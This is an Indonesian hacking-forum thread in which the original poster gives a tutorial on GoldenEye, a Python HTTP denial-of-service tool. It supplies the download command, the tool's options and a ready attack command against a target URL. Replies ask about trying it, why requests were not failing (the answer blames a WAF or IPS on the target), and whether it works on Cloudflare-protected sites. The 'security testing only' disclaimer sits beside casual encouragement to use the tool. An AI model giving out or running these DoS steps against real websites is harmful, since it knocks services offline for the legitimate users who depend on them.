Indonesian Back|Track Team

Full Version: DOS Website dengan Golden Eye
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pagi bro.. semoga dalam keadaan sehat ya bro. kali ini ane akan share Tool DOS Website dengan Golden Eye Tool ini dibuat dengan bahasa python, simple tapi powerfull. tanpa basa-basi langsung hajarrrr bro eh sikat bro Smile

Details for GoldenEye:
  • This tool is meant for research purposes only and any malicious usage of this tool is prohibited.
    GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
    GoldenEye is a HTTP DoS Test Tool.
    Attack Vector exploited: HTTP Keep Alive + NoCache

Goldeneye options:

Code:
USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

Download GoldenEye:
git clone https://github.com/jseidl/GoldenEye

setelah didownload buka lewat terminal:

┌──[root@Creed]──[~]
└── cd /root/GoldenEye
┌──[root@Creed]──[~/GoldenEye]
└── ./goldeneye.py <url target> -w 10 -s 10 -m random

[Image: Screenshot_2.png]


Penggunaan perintah di atas:

-w = 10 workers
-s = 10 simultenious connections
-m = random, a mix of GET and POST

sudah pagi bro waktunya ane tidurrr, semoga bermanfaat tutor sederhana ane..
ok thanks bro.. saya cicip haha
deface kah ? ini ?
ato gmna ?
(05-26-2015, 02:51 PM)dimascyber4rt Wrote: [ -> ]ok thanks bro.. saya cicip haha

iya sama2.. monggo mas Smile
(05-26-2015, 08:37 PM)Hendra Gunawan Wrote: [ -> ]deface kah ? ini ?
ato gmna ?

Serangan DOS tujuanya adalah satu membuat server tidak bisa menerima layanan untuk user yang sah dan pada akhirnya service nya down.
kok 0 failed ya ??

tolong di perjelas om
(12-28-2015, 12:28 PM)chuck3y Wrote: [ -> ]kok 0 failed ya ??

tolong di perjelas om

Kenapa itu om ?
Ada WAF atau IPS kali om di destination site nya, serangannya ditangguhkan gtu Big Grin
apakah ini bisa digunakan untuk website yg menggunakan CF ?